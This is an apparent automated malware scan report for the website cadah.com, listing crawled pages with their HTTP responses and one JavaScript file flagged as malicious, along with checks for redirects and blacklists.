Scanned pages/files
Request | Server response | Status |
http://cadah.com/ | 200 OK Content-Length: 16172 Content-Type: text/html | clean |
http://cadah.com/index.php | 200 OK Content-Length: 16172 Content-Type: text/html | clean |
http://cadah.com/locations.php | 200 OK Content-Length: 22040 Content-Type: text/html | clean |
http://cadah.com/staff.php | 200 OK Content-Length: 21083 Content-Type: text/html | clean |
http://cadah.com/services.php | 200 OK Content-Length: 18800 Content-Type: text/html | clean |
http://cadah.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 9966 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://cadah.com/insurance.php | 200 OK Content-Length: 16327 Content-Type: text/html | clean |
http://cadah.com/resources.php | 200 OK Content-Length: 17177 Content-Type: text/html | clean |
http://cadah.com/fko.php | 200 OK Content-Length: 15507 Content-Type: text/html | clean |
http://cadah.com/test404page.js | 404 Not Found Content-Length: 402 Content-Type: text/html | clean |
http://cadah.com/staff-harrison.php | 200 OK Content-Length: 16820 Content-Type: text/html | clean |
http://cadah.com/staff-linda.php | 200 OK Content-Length: 15976 Content-Type: text/html | clean |
http://cadah.com/staff-parker.php | 200 OK Content-Length: 17012 Content-Type: text/html | clean |
http://cadah.com/rebecca.php | 200 OK Content-Length: 16586 Content-Type: text/html | clean |
http://cadah.com/Jeannie.php | 200 OK Content-Length: 17226 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cadah.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 04:13:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_ssl/2.2.14 OpenSSL/0.9.8k mod_fcgid/2.3.4 PHP/5.3.2-1ubuntu4.28 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
Content-Type: text/html
X-Powered-By: PHP/5.3.2-1ubuntu4.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: cadah.com
Referer: http://www.google.com/search?q=cadah.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cadah.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cadah.com/
Result: cadah.com is not infected or malware details are not published yet.